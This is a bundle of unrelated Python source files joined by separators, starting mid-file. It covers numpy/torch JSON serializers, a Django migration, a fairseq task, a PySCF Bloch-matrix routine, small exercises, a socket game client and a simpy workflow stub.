0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]],
dtype=np.float32)
test(X, expected_X)
test(A, expected_A)
test(E, expected_E)
except ImportError:
print("Unable to use pyrosetta. Did you call init?")
|
#!/usr/bin/env python
#
# json_serializers.py
# Contains JSON (de)serializers for:
# torch.Tensor
# numpy.ndarray
# numpy.dtype
# numpy.floating
# numpy.integer
from __future__ import print_function
import six
import json
import base64
import io
import numpy as np
import torch
def deserialize_tuple(d):
    """
    Reconstruct a tuple from its JSONified form (see ``hint_tuples``).

    Args:
        d (:obj:`dict`): dictionary with an ``'items'`` sequence.

    Returns:
        The tuple built from ``d['items']``.
    """
    items = d['items']
    return tuple(items)
def serialize_dtype(o):
    """
    Serializes a :obj:`numpy.dtype`.

    Simple dtypes are stored as their string name; structured dtypes are
    stored as their full ``descr`` list.

    Args:
        o (:obj:`numpy.dtype`): :obj:`dtype` to be serialized.

    Returns:
        A dictionary that can be passed to :obj:`json.dumps`.
    """
    # len(dtype) is the number of named fields: 0 for simple dtypes.
    if len(o) == 0:
        return dict(
            _type='np.dtype',
            descr=str(o))
    return dict(
        _type='np.dtype',
        descr=o.descr)
def deserialize_dtype(d):
    """
    Deserializes a JSONified :obj:`numpy.dtype`.

    Args:
        d (:obj:`dict`): dictionary with a ``'descr'`` entry, either a plain
            dtype string or a structured-dtype description list.

    Returns:
        A :obj:`dtype` object.
    """
    descr = d['descr']
    # Simple dtypes were serialized as a plain string.
    if isinstance(descr, six.string_types):
        return np.dtype(descr)
    # Structured dtype: JSON turned the nested tuples into lists, so each
    # column description has to be rebuilt as a tuple.
    rebuilt = []
    for col in descr:
        fields = []
        for entry in col:
            if isinstance(entry, six.string_types):
                fields.append(str(entry))
            elif type(entry) is list:
                fields.append(tuple(entry))
            else:
                fields.append(entry)
        rebuilt.append(tuple(fields))
    return np.dtype(rebuilt)
def serialize_ndarray_b64(o):
    """
    Serializes a :obj:`numpy.ndarray` with a human-readable dtype and shape
    but base64-encoded binary array data.

    Args:
        o (:obj:`numpy.ndarray`): :obj:`ndarray` to be serialized.

    Returns:
        A dictionary that can be passed to :obj:`json.dumps`.
    """
    # base64 needs a contiguous buffer; copy only when necessary.
    buf = o.data if o.flags['C_CONTIGUOUS'] else np.ascontiguousarray(o).data
    return {
        '_type': 'np.ndarray',
        'data': base64.b64encode(buf).decode('utf-8'),
        'dtype': o.dtype,
        'shape': o.shape,
    }
def hint_tuples(o):
    """
    Annotates tuples before JSON serialization so they can be reconstructed
    on deserialization: each tuple becomes
    ``{'_type': 'tuple', 'items': (...)}``.

    Recurses through lists, so tuples nested at any depth inside lists are
    annotated as well.
    """
    if isinstance(o, list):
        return [hint_tuples(element) for element in o]
    if isinstance(o, tuple):
        return {'_type': 'tuple', 'items': o}
    return o
def serialize_ndarray_readable(o):
    """
    Serializes a :obj:`numpy.ndarray` in a fully human-readable format:
    nested lists for the data (tuples annotated via ``hint_tuples``) plus
    the dtype.

    Args:
        o (:obj:`numpy.ndarray`): :obj:`ndarray` to be serialized.

    Returns:
        A dictionary that can be passed to :obj:`json.dumps`.
    """
    return {
        '_type': 'np.ndarray',
        'dtype': o.dtype,
        'value': hint_tuples(o.tolist()),
    }
def serialize_ndarray_npy(o):
    """
    Serializes a :obj:`numpy.ndarray` using numpy's built-in :obj:`save`
    ("npy") format. The result is not human-readable, but round-trips any
    array reliably.

    Args:
        o (:obj:`numpy.ndarray`): :obj:`ndarray` to be serialized.

    Returns:
        A dictionary that can be passed to :obj:`json.dumps`.
    """
    buf = io.BytesIO()
    np.save(buf, o)
    buf.seek(0)
    # latin-1 maps every byte 0-255 to a code point, so the npy bytes
    # survive the round-trip through a JSON string unchanged.
    payload = json.dumps(buf.read().decode('latin-1'))
    return {'_type': 'np.ndarray', 'npy': payload}
def deserialize_ndarray_npy(d):
    """
    Deserializes a JSONified :obj:`numpy.ndarray` created with numpy's
    :obj:`save` function.

    Args:
        d (:obj:`dict`): dictionary holding the npy payload under ``'npy'``,
            JSON-encoded as a latin-1 string.

    Returns:
        An :obj:`ndarray` object.
    """
    raw = json.loads(d['npy']).encode('latin-1')
    buf = io.BytesIO(raw)
    return np.load(buf)
def deserialize_ndarray(d):
    """
    Deserializes a JSONified :obj:`numpy.ndarray`. Can handle arrays serialized
    using any of the methods in this module: :obj:`"npy"`, :obj:`"b64"`,
    :obj:`"readable"`.

    Args:
        d (`dict`): A dictionary representation of an :obj:`ndarray` object.

    Returns:
        An :obj:`ndarray` object.

    Raises:
        ValueError: if *d* contains none of the recognized payload keys.
    """
    if 'data' in d:
        # Fix: np.fromstring is deprecated (and removed for binary input in
        # newer numpy); np.frombuffer is its replacement. The .copy() restores
        # the writable array that fromstring used to return (frombuffer alone
        # yields a read-only view of the decoded bytes).
        x = np.frombuffer(
            base64.b64decode(d['data']),
            dtype=d['dtype']).copy()
        x.shape = d['shape']
        return x
    elif 'value' in d:
        return np.array(d['value'], dtype=d['dtype'])
    elif 'npy' in d:
        return deserialize_ndarray_npy(d)
    else:
        raise ValueError('Malformed np.ndarray encoding.')
def serialize_torch_tensor(o):
    """
    Serializes a :obj:`torch.Tensor` by converting it to a numpy array,
    which this module's encoder then serializes in turn.
    """
    payload = o.numpy()
    return {'_type': 'torch.Tensor', 'data': payload}
def deserialize_torch_tensor(d):
    """
    Rebuilds a :obj:`torch.Tensor` from its serialized form; the tensor
    shares memory with the numpy array stored under ``'data'``.
    """
    arr = d['data']
    return torch.from_numpy(arr)
def serialize_quantity(o):
    """
    Serializes an :obj:`astropy.units.Quantity`, for JSONification.

    Args:
        o (:obj:`astropy.units.Quantity`): :obj:`Quantity` to be serialized.

    Returns:
        A dictionary that can be passed to :obj:`json.dumps`.
    """
    return {
        '_type': 'astropy.units.Quantity',
        'value': o.value,
        'unit': o.unit.to_string(),
    }
def deserialize_quantity(d):
    """
    Deserializes a JSONified :obj:`astropy.units.Quantity`.

    NOTE(review): relies on a module-level ``units`` name
    (``astropy.units``), which is not imported in the visible part of this
    file -- confirm the import exists elsewhere.

    Args:
        d (:obj:`dict`): A dictionary representation of a :obj:`Quantity` object.

    Returns:
        A :obj:`Quantity` object.
    """
    return units.Quantity(d['value'], unit=d['unit'])
def serialize_skycoord(o):
    """
    Serializes an :obj:`astropy.coordinates.SkyCoord`, for JSONification.

    Args:
        o (:obj:`astropy.coordinates.SkyCoord`): :obj:`SkyCoord` to be serialized.

    Returns:
        A dictionary that can be passed to :obj:`json.dumps`.
    """
    # NOTE(review): `o.representation` is deprecated in newer astropy in
    # favour of `representation_type` -- confirm the astropy version in use.
    representation = o.representation.get_name()
    frame = o.frame.name
    # Always serialize in spherical representation (lon/lat[/distance]).
    r = o.represent_as('spherical')
    d = dict(
        _type='astropy.coordinates.SkyCoord',
        frame=frame,
        representation=representation,
        lon=r.lon,
        lat=r.lat)
    # An empty unit string is used as "no real distance set"; only store the
    # distance when a unit is present.
    if len(o.distance.unit.to_string()):
        d['distance'] = r.distance
    return d
def deserialize_skycoord(d):
    """
    Deserializes a JSONified :obj:`astropy.coordinates.SkyCoord`.

    NOTE(review): relies on a module-level ``coords`` name
    (``astropy.coordinates``), which is not imported in the visible part of
    this file -- confirm the import exists elsewhere.

    Args:
        d (:obj:`dict`): A dictionary representation of a :obj:`SkyCoord` object.

    Returns:
        A :obj:`SkyCoord` object.
    """
    args = [d['lon'], d['lat']]
    if 'distance' in d:
        args.append(d['distance'])
    return coords.SkyCoord(
        *args,
        frame=d['frame'],
        representation='spherical')
def get_encoder(ndarray_mode='b64'):
    """
    Returns a JSON encoder that can handle:
        * :obj:`torch.Tensor`
        * :obj:`numpy.ndarray`
        * :obj:`numpy.floating` (converted to :obj:`float`)
        * :obj:`numpy.integer` (converted to :obj:`int`)
        * :obj:`numpy.bool_` (converted to :obj:`bool`)
        * :obj:`numpy.dtype`

    Args:
        ndarray_mode (Optional[:obj:`str`]): Which method to use to serialize
            :obj:`numpy.ndarray` objects. Defaults to :obj:`'b64'`, which converts the
            array data to binary64 encoding (non-human-readable), and stores the
            datatype/shape in human-readable formats. Other options are
            :obj:`'readable'`, which produces fully human-readable output, and
            :obj:`'npy'`, which uses numpy's built-in :obj:`save` function and
            produces completely unreadable output. Of all the methods :obj:`'npy'`
            is the most reliable, but also least human-readable. :obj:`'readable'`
            produces the most human-readable output, but is the least reliable
            and loses precision.

    Returns:
        A subclass of :obj:`json.JSONEncoder`.

    Raises:
        ValueError: if *ndarray_mode* is not one of the supported modes.
    """
    # Use specified numpy.ndarray serialization mode
    serialize_fns = {
        'b64': serialize_ndarray_b64,
        'readable': serialize_ndarray_readable,
        'npy': serialize_ndarray_npy}
    if ndarray_mode not in serialize_fns:
        # Fix: the original formatted the bound method `serialize_fns.keys`
        # (missing the call), so the message showed
        # '<built-in method keys ...>' instead of the valid mode names.
        raise ValueError('"ndarray_mode" must be one of {}'.format(
            list(serialize_fns)))
    serialize_ndarray = serialize_fns[ndarray_mode]

    class MultiJSONEncoder(json.JSONEncoder):
        """
        A JSON encoder that can handle:
            * :obj:`torch.Tensor`
            * :obj:`numpy.ndarray`
            * :obj:`numpy.floating` (converted to :obj:`float`)
            * :obj:`numpy.integer` (converted to :obj:`int`)
            * :obj:`numpy.dtype`
        """
        def default(self, o):
            if isinstance(o, torch.Tensor):
                return serialize_torch_tensor(o)
            elif isinstance(o, np.ndarray):
                return serialize_ndarray(o)
            elif isinstance(o, np.dtype):
                return serialize_dtype(o)
            elif isinstance(o, np.floating):
                return float(o)
            elif isinstance(o, np.integer):
                return int(o)
            elif isinstance(o, np.bool_):
                return bool(o)
            elif isinstance(o, np.void):
                # np.void scalars (structured-array rows) round-trip through
                # an ndarray when possible.
                try:
                    o = np.array(o)
                except Exception:
                    # Fix: was a bare `except:`, which also swallowed
                    # KeyboardInterrupt/SystemExit.
                    pass
                else:
                    return o
            return json.JSONEncoder.default(self, o)

    return MultiJSONEncoder
class MultiJSONDecoder(json.JSONDecoder):
    """
    A JSON decoder that reverses this module's serializers by inspecting the
    ``'_type'`` tag of each decoded object: :obj:`torch.Tensor`,
    :obj:`numpy.ndarray`, :obj:`numpy.dtype` and annotated tuples.
    """
    def __init__(self, *args, **kwargs):
        json.JSONDecoder.__init__(
            self,
            object_hook=self.object_hook,
            *args,
            **kwargs)

    def object_hook(self, d):
        if not isinstance(d, dict):
            return d
        tag = d.get('_type')
        if tag == 'torch.Tensor':
            return deserialize_torch_tensor(d)
        if tag == 'np.ndarray':
            return deserialize_ndarray(d)
        if tag == 'np.dtype':
            return deserialize_dtype(d)
        if tag == 'tuple':
            return deserialize_tuple(d)
        return d
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add five optional contact-related fields to the Customer model.

    All verbose names are Chinese labels stored as unicode escapes; the
    translation of each is noted on the corresponding operation below.
    """

    dependencies = [
        ('core', '0028_auto_20151222_1711'),
    ]

    operations = [
        # verbose_name: 联系人 -- "contact person"
        migrations.AddField(
            model_name='customer',
            name='contact',
            field=models.CharField(max_length=20, null=True, verbose_name='\u8054\u7cfb\u4eba', blank=True),
        ),
        # verbose_name: 邮箱 -- "e-mail address"
        migrations.AddField(
            model_name='customer',
            name='email',
            field=models.EmailField(max_length=20, null=True, verbose_name='\u90ae\u7bb1', blank=True),
        ),
        # verbose_name: 紧急联系人 -- "emergency contact person"
        migrations.AddField(
            model_name='customer',
            name='emergency_contact',
            field=models.CharField(max_length=20, null=True, verbose_name='\u7d27\u6025\u8054\u7cfb\u4eba', blank=True),
        ),
        # verbose_name: 紧急联系人手机 -- "emergency contact's mobile number"
        migrations.AddField(
            model_name='customer',
            name='emergency_mobile',
            field=models.CharField(max_length=20, null=True, verbose_name='\u7d27\u6025\u8054\u7cfb\u4eba\u624b\u673a', blank=True),
        ),
        # verbose_name: 联系人手机 -- "contact person's mobile number"
        migrations.AddField(
            model_name='customer',
            name='mobile',
            field=models.CharField(max_length=20, null=True, verbose_name='\u8054\u7cfb\u4eba\u624b\u673a', blank=True),
        ),
    ]
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 26 11:15:35 2019
@author: michaelek
"""
import os
import pandas as pd
from hydrointerp import Interp
from ecandbparams import sql_arg
from pdsql import mssql
import parameters as param
import eto_estimates as eto
# Show up to 10 columns when printing pandas frames while debugging.
pd.options.display.max_columns = 10
###################################
### Parameters
# SQL-argument helper from the ECan DB parameter store.
sql1 = sql_arg()
# Base query parameters for the SWAZ GIS layer.
swaz_gis_dict = sql1.get_dict('swaz_gis')
## Selection of specific SWAZ groups - remove for final method
where_in = {'where_in': {'ZONE_GROUP_NAME': param.swaz_grps}}
swaz_gis_dict.update(where_in)
# Per-run cache file name for the SWAZ ETo estimates.
eto_swaz_csv = 'eto_swaz_{}.csv'.format(param.run_time)
#################################
### Estimate ETo at swaz locations
print('ETo at swaz locations')
try:
    # Prefer a previously computed cache file for this run_time; the heavy
    # spatial interpolation below only runs when the load fails.
    swaz_eto = pd.read_csv(os.path.join(param.inputs_path, eto_swaz_csv), parse_dates=['time'], infer_datetime_format=True)
    print('-> loaded from local file')
except Exception:
    # Fix: was a bare `except:`, which also swallowed KeyboardInterrupt and
    # SystemExit; Exception still covers a missing or unreadable cache file.
    print('-> Estimate ETo at SWAZs via spatial interp')
    ## Read in data
    print('Read in SWAZ data')
    swaz1 = mssql.rd_sql(**swaz_gis_dict)
    # Replace the polygon geometry with centroid x/y coordinates.
    swaz2 = swaz1.drop('geometry', axis=1).copy()
    swaz2['x'] = swaz1.centroid.x
    swaz2['y'] = swaz1.centroid.y
    ## Estimate ETo
    # Restrict the ETo source data to the requested date window.
    eto1 = eto.eto0[(eto.eto0.time >= param.from_date) & (eto.eto0.time <= param.to_date)].copy()
    # Cubic spatial interpolation from WGS84 (EPSG:4326) points onto the
    # SWAZ centroids in NZTM (EPSG:2193); ETo is clipped at 0.
    interp1 = Interp(eto1, 'time', 'x', 'y', 'ETo', 4326)
    swaz_eto1 = interp1.points_to_points(swaz2, 2193, method='cubic', min_val=0)
    swaz_eto = pd.merge(swaz2, swaz_eto1.reset_index(), on=['x', 'y'])
    # Cache the result for the next run.
    swaz_eto.to_csv(os.path.join(param.inputs_path, eto_swaz_csv), index=False)
#################################
### Testing
#df = eto.eto0.copy()
#time_name = 'time'
#x_name = 'x'
#y_name = 'y'
#data_name = 'ETo'
#point_data = swaz2.copy()
#from_crs = 4326
#to_crs = 2193
#method = 'linear'
#digits = 2
#min_val = None
#swaz_etpo1 = points_to_points(eto.eto0, 'time', 'x', 'y', 'ETo', swaz2, 4326, 2193)
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
from fairseq.tasks import register_task
from fairseq.tasks.joint_task import JointTrainingTask
logger = logging.getLogger(__name__)
@register_task("joint_task_mtst")
class JointTrainingMTSTTask(JointTrainingTask):
    """Joint training over a machine-translation (MT) and a speech-translation
    (ST) task, with MT as the main task.

    Before an ST update, the MT model's decoder embedding and output
    projection (plus any module groups named in ``--other-unshare-modules``)
    are cached away and replaced by the ST model's versions; after the update
    they are restored via :meth:`shift_model_back`.
    """

    # Config file names identifying each sub-task; the MT task drives training.
    st_task = 'task_st.yaml'
    mt_task = 'task_mt.yaml'
    main_task = mt_task

    @staticmethod
    def add_args(parser):
        """Register this task's CLI options on top of JointTrainingTask's."""
        JointTrainingTask.add_args(parser)
        parser.add_argument(
            '--other-unshare-modules',
            nargs='+', type=str,
            choices=['encoder-transformers', 'decoder-transformers',
                     'interlingua-transformers'],
            default=[],
        )

    def __init__(self, args, tasks, task_configs, main_task_name):
        super().__init__(args, tasks, task_configs, main_task_name)
        # Extra module groups that must NOT be shared between MT and ST.
        self.other_unshare_modules = args.other_unshare_modules
        # Tracks whose modules are currently wired into the models.
        self.state = self.main_task

    def resetup(self, args):
        """Refresh argument-derived settings (e.g. after args are reloaded)."""
        self.other_unshare_modules = args.other_unshare_modules

    def shift_model(self, task_name, model):
        """Swap ST-specific modules into place before running *task_name*.

        For the ST task, the MT decoder embedding/projection (and any
        opted-in module groups) are cached and replaced with the ST model's;
        for the MT task nothing needs to change.

        Raises:
            ValueError: if *task_name* is neither the ST nor the MT task.
        """
        st_model = model[self.st_task]
        mt_model = model[self.mt_task]
        if task_name == self.st_task:
            self.cache_module(
                'mt_decoder_embedding', 'embed_tokens',
                mt_model.decoder, st_model.decoder
            )
            self.cache_module(
                'mt_decoder_projection', 'output_projection',
                mt_model.decoder, st_model.decoder
            )
            if 'encoder-transformers' in self.other_unshare_modules:
                self.cache_module(
                    'mt_encoder_transformers', 'transformer_layers',
                    mt_model.encoder, st_model.encoder
                )
            if 'decoder-transformers' in self.other_unshare_modules:
                self.cache_module(
                    'mt_decoder_transformers', 'layers',
                    mt_model.decoder, st_model.decoder
                )
            if 'interlingua-transformers' in self.other_unshare_modules:
                self.cache_module(
                    'mt_interlingua_transformers', 'interlingua_layers',
                    mt_model.encoder, st_model.encoder
                )
            self.state = self.st_task
        elif task_name == self.mt_task:
            pass
        else:
            # Fix: was a bare `raise Exception()` carrying no context.
            raise ValueError('unknown task name: {}'.format(task_name))

    def shift_model_back(self, task_name, model):
        """Restore the MT modules cached by :meth:`shift_model`.

        Raises:
            ValueError: if *task_name* is neither the ST nor the MT task.
        """
        mt_model = model[self.mt_task]
        if task_name == self.st_task:
            self.cache_module_recover(
                'mt_decoder_embedding', 'embed_tokens',
                mt_model.decoder
            )
            self.cache_module_recover(
                'mt_decoder_projection', 'output_projection',
                mt_model.decoder
            )
            if 'encoder-transformers' in self.other_unshare_modules:
                self.cache_module_recover(
                    'mt_encoder_transformers', 'transformer_layers',
                    mt_model.encoder,
                )
            if 'decoder-transformers' in self.other_unshare_modules:
                self.cache_module_recover(
                    'mt_decoder_transformers', 'layers',
                    mt_model.decoder
                )
            if 'interlingua-transformers' in self.other_unshare_modules:
                self.cache_module_recover(
                    'mt_interlingua_transformers', 'interlingua_layers',
                    mt_model.encoder
                )
            self.state = self.mt_task
        elif task_name == self.mt_task:
            pass
        else:
            # Fix: was a bare `raise Exception()` carrying no context.
            raise ValueError('unknown task name: {}'.format(task_name))
|
""" Make a list of people who should take the favorite
languages poll and then loop through the list and find
some new member for the poll """
favorite_languages = {
'jen': 'python',
'sarah': 'c',
'edward': 'ruby',
'phil': 'python',
}
names = ['james', 'sarah', 'carolina', 'edward', 'cynthya']
for name in names:
if name in favorite_languages:
print(f'Thanks {name.title()} for responding')
else:
print(f'Hi {name.title()} would you like to take the poll?') |
class Solution:
    def findNumbers(self, nums: List[int]) -> int:
        """Return how many integers in *nums* have an even number of digits.

        Args:
            nums: list of integers.

        Returns:
            Count of elements whose decimal digit count is even.
        """
        # len(str(abs(x))) counts digits directly. Unlike the original
        # divide-by-10 loop this is correct for 0 (the loop counted zero
        # digits and misclassified 0 as even-digited) and terminates for
        # negatives (floor division kept negative values nonzero forever).
        return sum(1 for x in nums if len(str(abs(x))) % 2 == 0)
|
import sys
from classFinder import *
# Fix: converted Python-2 print statements to print() calls, which behave
# identically for these arguments and also run under Python 3.
if len(sys.argv) != 2:
    print("Parses documentation to find commands for each kind of commandable object")
    print("Usage: %s <javadoc dir>" % (sys.argv[0]))
    sys.exit()
docDir = sys.argv[1]

# Look for all classes documented under the given javadoc directory.
lib = ClassLibrary()
lib.findClasses(docDir)

# Get every (transitive) subclass of BaseModel.
# (The original comment said "BaseStatistics" but the code queries "BaseModel".)
stats = lib.getCompleteSubclasses("BaseModel")
print([x.name for x in stats])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
# Packaging metadata for django-librarywatch (installed as "librarywatch").
setup(
    name='librarywatch',
    version='1.0.1',
    description='A utility to check PyPi for updates to currently installed packages',
    author='Jeff Triplett / Adam Fast',
    author_email='adamfast@gmail.com',
    url='https://github.com/adamfast/django-librarywatch',
    # Include every Python package found in the source tree.
    packages=find_packages(),
    package_data={
    },
    # Trove classifiers describing the target environment and license.
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Topic :: Utilities'
    ],
)
|
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division
import numpy as np
from ctypes import POINTER, c_float, c_int64
from pyscf.nao.m_libnao import libnao
# ctypes signature of the compiled helper c_csr_bloch_mat in libnao;
# declaring argtypes up-front lets ctypes validate the pointer marshalling.
libnao.c_csr_bloch_mat.argtypes = (
  POINTER(c_int64), # r2s ! row -> start index in data and cols arrays
  POINTER(c_int64), # nrows ! number of rows (number of orbitals in unit cell)
  POINTER(c_int64), # i2col ! index -> column
  POINTER(c_float), # i2dat ! index -> data element
  POINTER(c_float), # i2xyz ! index -> coordinate difference
  POINTER(c_int64), # nnz ! number of non-zero matrix elements (maximal index)
  POINTER(c_int64), # orb_sc2orb_uc ! orbital in Super Cell -> orbital in Unit cell correspondence
  POINTER(c_int64), # norbs_sc ! size of the previous array
  POINTER(c_float), # kvec ! Cartesian coordinates of a k-vector
  POINTER(c_float*2)) # cmat ! Bloch matrix (nrows,nrows) -- complex64 passed as float pairs
def siesta_hsx_bloch_mat(csr, hsx, kvec=np.array([0.0,0.0,0.0])):
    """Fold the real-space sparse (CSR) matrix into a dense Bloch matrix at
    k-vector *kvec* using the compiled helper libnao.c_csr_bloch_mat.

    Args:
        csr: CSR-like matrix with indptr/indices/data/nnz.
        hsx: SIESTA HSX container with x4 (per-element coordinate
            differences), norbs, norbs_sc and orb_sc2orb_uc.
        kvec: Cartesian k-vector. NOTE(review): the np.array default is a
            shared mutable object -- safe only while callers never modify it.

    Returns:
        (norbs, norbs) np.complex64 ndarray filled in by the C routine.
    """
    assert csr.nnz==hsx.x4.shape[0]
    assert hsx.norbs==len(csr.indptr)-1
    # np.require forces C-contiguous buffers of exactly the dtypes the C
    # signature declares; 'CW' additionally makes the output writable.
    r2s = np.require( csr.indptr, dtype=np.int64, requirements='C')
    i2col = np.require( csr.indices, dtype=np.int64, requirements='C')
    i2dat = np.require( csr.data, dtype=np.float32, requirements='C')
    i2xyz = np.require( hsx.x4, dtype=np.float32, requirements='C')
    osc2o = np.require( hsx.orb_sc2orb_uc, dtype=np.int64, requirements='C')
    kvecc = np.require( kvec, dtype=np.float32, requirements='C')
    cmat = np.require( np.zeros((hsx.norbs,hsx.norbs), dtype=np.complex64), requirements='CW')
    # complex64 entries are marshalled as pairs of c_float (c_float*2).
    libnao.c_csr_bloch_mat( r2s.ctypes.data_as(POINTER(c_int64)),
        c_int64(hsx.norbs),
        i2col.ctypes.data_as(POINTER(c_int64)),
        i2dat.ctypes.data_as(POINTER(c_float)),
        i2xyz.ctypes.data_as(POINTER(c_float)),
        c_int64(csr.nnz),
        osc2o.ctypes.data_as(POINTER(c_int64)),
        c_int64(hsx.norbs_sc),
        kvecc.ctypes.data_as(POINTER(c_float)),
        cmat.ctypes.data_as(POINTER(c_float*2))
        )
    return cmat
#
#
#
def siesta_hsx_bloch_mat_py(csr, hsx, kvec=[0.0,0.0,0.0], prec=64):
    """Pure-python reference implementation of c_csr_bloch_mat: fold the
    real-space sparse (CSR) matrix into a dense Bloch matrix at *kvec*.

    Args:
        csr: CSR-like matrix with indptr/indices/data/nnz.
        hsx: container with x4 (nnz, 3) coordinate differences, norbs and
            orb_sc2orb_uc (supercell -> unit-cell orbital map).
        kvec: Cartesian k-vector (never mutated, so the mutable default is
            harmless; kept as a list for signature compatibility).
        prec: float precision (e.g. 32 or 64); the result dtype is
            complex{2*prec}.

    Returns:
        (norbs, norbs) complex ndarray.
    """
    # Fix: was `assert(type(prec)==int)` -- isinstance is the idiomatic check.
    assert isinstance(prec, int)
    assert csr.nnz == hsx.x4.shape[0]
    assert hsx.norbs == len(csr.indptr) - 1
    # Per-element Bloch phase factor applied to every stored matrix element.
    caux = np.exp(1.0j * np.dot(hsx.x4, kvec)) * csr.data
    den_bloch = np.zeros((hsx.norbs, hsx.norbs), dtype='complex' + str(2 * prec))
    for row in range(hsx.norbs):
        for ind in range(csr.indptr[row], csr.indptr[row + 1]):
            # Map the supercell column index back into the unit cell and
            # accumulate (several supercell elements can fold onto one entry).
            col = hsx.orb_sc2orb_uc[csr.indices[ind]]
            den_bloch[col, row] += caux[ind]
    return den_bloch
|
# DNA -> RNA Transcription
def transcribe(seq: str) -> str:
    """
    Transcribes DNA to RNA by building the complement sequence with the
    T -> U replacement: A->U, T->A, C->G, and any other character
    (expected to be G) -> C.
    """
    complement = {'A': 'U', 'T': 'A', 'C': 'G'}
    return ''.join(complement.get(base, 'C') for base in seq)
def reverse_transcribe(seq: str) -> str:
    """
    Return the RNA form of the coding strand: the DNA sequence is
    complemented twice (transcribe, then complement again), which nets out
    to replacing T with U while A, C and G pass through unchanged. Any
    non-ACTG input character ends up as G.

    NOTE(review): despite the name, the strand order is never reversed --
    the original docstring ("...then reverses the strand") did not match
    the code. The behaviour (double complement == T->U substitution) is
    preserved here and only the documentation is corrected.
    """
    # Composite of the two complement passes: A->U->A, T->A->U, C->G->C,
    # G (and anything else) -> C -> G.
    composite = {'A': 'A', 'T': 'U', 'C': 'C'}
    return ''.join(composite.get(base, 'G') for base in seq)
|
# -*- coding: UTF-8 -*-
from GameMessage import Message
from Core import Packer
import asyncore, socket
import threading
import time
import sys
import Setting
# Outgoing message queue shared between the console-reader thread
# (producer) and the asyncore client (consumer).
MESSAGES = []
class ClientInput(threading.Thread):
    """Background thread that reads console lines and appends them to the
    module-level MESSAGES queue for the client to send."""
    def __init__(self):
        threading.Thread.__init__(self)
        # True while blocked inside raw_input; the client skips socket reads
        # during this window so server output does not garble the prompt.
        self.is_inputing = False
        # Set by GameClient.handle_close to end the read loop.
        self.stop = False
    def run(self):
        while not self.stop:
            self.is_inputing = True
            # Python-2 builtin (input() in Python 3); blocks until a line.
            line = raw_input(">>> ")
            self.is_inputing = False
            MESSAGES.append(line)
            time.sleep(0.01)
# Start the console-reader thread; daemon so it cannot keep the process alive.
INPUT = ClientInput()
INPUT.daemon = True
INPUT.start()
class GameClient(asyncore.dispatcher):
    """Asyncore TCP client: prints data received from the server and sends
    lines queued by the console-input thread.

    NOTE(review): this module is Python 2 (raw_input, str-typed sockets);
    asyncore itself was removed from the stdlib in Python 3.12.
    """
    def __init__(self, con_params):
        asyncore.dispatcher.__init__(self)
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        # (attribute name typo "connetc_params" kept for compatibility)
        self.connetc_params = con_params
        self.set_reuse_addr()
        self.connect(con_params)
        # Initial handshake message, sent as soon as the socket is writable.
        self.buffer = Packer.pack_msg(Message.MS_Connect, 1)
    def handle_connect(self):
        print("connection is success")
    def handle_read(self):
        # Skip reads while the user is typing so server output does not
        # interleave with the input prompt.
        if not INPUT.is_inputing:
            recvs = self.recv(8192)
            if not recvs:
                return
            print("server:"+recvs)
    def writable(self):
        # Refill the outgoing buffer from the console queue once drained.
        if self.buffer == '' and MESSAGES:
            self.buffer = MESSAGES.pop(0)
        return len(self.buffer) > 0
    def handle_write(self):
        sent = self.send(self.buffer)
        self.buffer = self.buffer[sent:]
    def handle_close(self):
        # Fix: the original defined handle_close twice; the first definition
        # (which only called self.close()) was dead code, silently shadowed
        # by this one. The duplicate has been removed.
        INPUT.stop = True
        print("Client Socket is closing")
        self.close()
        sys.exit()
# Connect to the main gateway process and run the asyncore event loop.
client = GameClient(Setting.GateServer)
asyncore.loop(timeout=0.001)
|
# This class is intentionally trivial; it exists purely for illustration.
# It demonstrates that you can use all the nice pytest fixtures from
# Kotti itself in your tests without needing to derive from UnitTestCase.
# The db_session parameter is a fixture, defined in here:
# https://github.com/Pylons/Kotti/blob/master/kotti/tests/configure.py
# If you don't know about pytest fixtures, take a deeper
# look here: http://pytest.org/latest/fixture.html.
class TestExample:
    """Smoke test showing Kotti's pytest fixtures (here: db_session) in use."""
    def test_root(self, db_session):
        from kotti.resources import get_root
        assert get_root() is not None
|
from functools import partial, wraps
import simpy
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import time
def trace(env, callback):
    """Monkey-patch ``env.step`` so that *callback* is invoked with the next
    queued event's ``(t, prio, eid, event)`` just before each step runs."""
    original_step = env.step

    @wraps(original_step)
    def stepper():
        if len(env._queue):
            t, prio, eid, event = env._queue[0]
            callback(t, prio, eid, event)
        return original_step()

    env.step = stepper
def monitor(data, t, prio, eid, event):
    """Record a ``(time, event-id, event-type)`` triple in *data*;
    the priority argument is accepted but not stored."""
    record = (t, eid, type(event))
    data.append(record)
class WorkFlow:
    """Base class for simulated workflows; subclasses override the hooks."""

    def __init__(self, topology, name):
        self.topology = topology
        self.name = name
        self.debug = False  # verbose per-packet logging, off by default
        self.info = True    # high-level progress messages, on by default

    def receive(self, packet):
        """Hook: a packet arrived. No-op in the base class."""
        return

    def start(self):
        """Hook: begin the workflow. No-op in the base class."""
        return

    def failed(self, packet, net_elem):
        """Hook: a packet was dropped at ``net_elem``. No-op here."""
        return

    def reset(self):
